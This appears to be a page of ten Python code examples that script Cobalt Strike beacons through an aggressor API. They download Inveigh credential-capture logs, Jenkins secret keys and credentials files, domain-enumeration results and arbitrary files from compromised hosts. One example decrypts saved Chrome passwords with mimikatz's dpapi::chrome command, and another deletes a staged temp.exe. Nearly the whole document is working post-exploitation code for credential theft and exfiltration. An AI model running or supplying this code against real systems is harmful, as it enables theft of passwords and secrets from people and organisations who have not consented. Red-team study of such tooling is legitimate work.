Exemple #1
def _(bid):
    """Remove ``temp.exe`` from the beacon user's home directory, then download the file ``c`` beside it.

    Args:
        bid: beacon id handed through to the aggressor API.
    """
    # helpers.guess_home is opaque here; assumed to return a Windows path string — verify.
    home = helpers.guess_home(bid)
    staged_exe = r'{}\temp.exe'.format(home)
    result_file = r'{}\c'.format(home)

    # Both calls run against the beacon host; brm first, then the download.
    aggressor.brm(bid, staged_exe)
    aggressor.bdownload(bid, result_file)
Exemple #2
def _(bid, home=None):
    """Download the inveigh output files from the user's AppData/Roaming/Microsoft folder.

    Args:
        bid: beacon id.
        home: user profile directory; when falsy it is taken from ``helpers.guess_home(bid)``.
    """
    profile = home or helpers.guess_home(bid)
    directory = r'{}\AppData\Roaming\Microsoft'.format(profile)

    aggressor.btask(
        bid, 'Tasked beacon to grab inveigh files from {}'.format(directory))

    # Fixed inveigh output names, requested in this order.
    for suffix in ('clear', 'log', 'v1', 'v2', 'form'):
        aggressor.bdownload(bid, r'{}\{}'.format(directory, suffix))
Exemple #3
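def _(bid, host=None):
    """Download the Jenkins configuration and secret files, locally or from a remote host.

    Args:
        bid: beacon id.
        host: optional remote host; when given, the install path is rewritten through
            ``helpers.path_to_unc``. When omitted the local install path is used.

    Note:
        The original left ``prefix`` unbound when ``host`` was falsy, so the call
        raised UnboundLocalError before tasking anything; the local path is now used.
    """
    jenkins_dir = r'C:\program files (x86)\jenkins'
    files = [
        'secret.key', 'queue.xml', 'config.xml', 'jenkins.xml',
        'github-plugin-configuration.xml', 'credentials.xml',
        'scriptApproval.xml', 'scm-sync-configuration.xml',
        'secrets/master.key', 'secrets/hudson.util.Secret'
    ]

    # helpers.path_to_unc is opaque here — presumably yields a UNC form of jenkins_dir.
    prefix = helpers.path_to_unc(host, jenkins_dir) if host else jenkins_dir

    aggressor.btask(
        bid, 'Tasked beacon to download files in {}: {}'.format(
            prefix, ', '.join(files)))
    for fname in files:
        # silent=True is passed through as in the original; presumably suppresses the
        # per-file task message, which the single btask above already covers.
        aggressor.bdownload(bid, r'{}\{}'.format(prefix, fname), silent=True)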
Exemple #4
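def _(bid):
    """Download the default Chrome profile's History, Bookmarks, Web Data and Login Data.

    History, Bookmarks and Web Data are pulled directly. Login Data is copied to a
    ``.bak2`` sibling first, handed to mimikatz ``dpapi::chrome /unprotect`` on the
    beacon host, and the copy is removed afterwards. Cookies handling was commented
    out upstream and is not performed; the unused ``cookies`` locals are dropped.

    Args:
        bid: beacon id.
    """
    # %localappdata% is substituted client-side from the guessed home directory, so
    # the resulting path is a guess and is wrong for non-default profiles.
    chrome_dir = r'%localappdata%\Google\Chrome\User Data\Default'
    profile_dir = chrome_dir.replace(
        '%localappdata%', r'{}\AppData\Local'.format(helpers.guess_home(bid)))

    login_data = r'{}\Login Data'.format(profile_dir)
    history = r'{}\History'.format(profile_dir)
    bookmarks = r'{}\Bookmarks'.format(profile_dir)
    web_data = r'{}\Web Data'.format(profile_dir)
    login_data_copied = '{}.bak2'.format(login_data)

    # non-protected files (History/Bookmarks/Web Data): downloaded as-is
    aggressor.bdownload(bid, history)
    aggressor.bdownload(bid, bookmarks)
    aggressor.bdownload(bid, web_data)

    # protected file (Login Data): copied first (reason not stated upstream —
    # presumably the live file is locked). The .bak2 copy and the mimikatz command
    # line are host-side artifacts until brm removes the copy.
    aggressor.bcp(bid, login_data, login_data_copied)
    aggressor.bmimikatz(
        bid, r'dpapi::chrome /in:"{}" /unprotect'.format(login_data_copied))
    aggressor.brm(bid, login_data_copied)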
Exemple #5
def _(bid, *files):
    """Download each named file from the beacon host, in argument order.

    Args:
        bid: beacon id.
        *files: remote paths, passed verbatim to ``aggressor.bdownload``.
    """
    for remote_path in files:
        aggressor.bdownload(bid, remote_path)
Exemple #6
 def callback(path):
     """Download *path* from the beacon; ``bid`` is taken from the enclosing scope (not shown here)."""
     aggressor.bdownload(bid, path)
Exemple #7
 def callback(path):
     """Download *path* only when its extension is in the enclosing ``extensions`` collection.

     ``bid`` and ``extensions`` come from the enclosing scope (not shown here). The
     extension is the text after the last dot; a path without a dot yields the whole
     path, which then has to match ``extensions`` verbatim.
     """
     suffix = path.rpartition('.')[2]
     if suffix not in extensions:
         return
     aggressor.bdownload(bid, path)
Exemple #8
def _(bid, directory, *files):
    """Download every entry of *files* from *directory* on the beacon host.

    Args:
        bid: beacon id.
        directory: remote directory; joined to each name with a single backslash,
            with no normalisation.
        *files: file names relative to *directory*.
    """
    remote_paths = [r'{}\{}'.format(directory, fname) for fname in files]
    for remote_path in remote_paths:
        aggressor.bdownload(bid, remote_path)
Exemple #9
def _(bid, *args):
    """Download a single file whose remote path is the space-joined *args*.

    Joining lets an unquoted path containing spaces arrive as several arguments.

    Args:
        bid: beacon id.
        *args: path fragments, joined with one space each.
    """
    aggressor.bdownload(bid, ' '.join(args))
Exemple #10
def _(bid):
    """Download the domain-enum stage-2 output files from the beacon's temp directory.

    Args:
        bid: beacon id.
    """
    temp = helpers.guess_temp(bid)

    aggressor.btask(
        bid,
        'Tasked beacon to download files from domain-enum (stage 2/3). Once finished run domain-enum-next2'
    )

    # Output stems (each stored as <stem>.domain) — presumably written by the
    # earlier domain-enum stage; requested in this fixed order.
    outputs = (
        'objects', 'policy', 'sites', 'subnets', 'gpo_localgroups',
        'gpo_delegations', 'gpo_acls', 'trusts', 'managers', 'interesting_acls',
    )
    for stem in outputs:
        aggressor.bdownload(bid, r'{}\{}.domain'.format(temp, stem))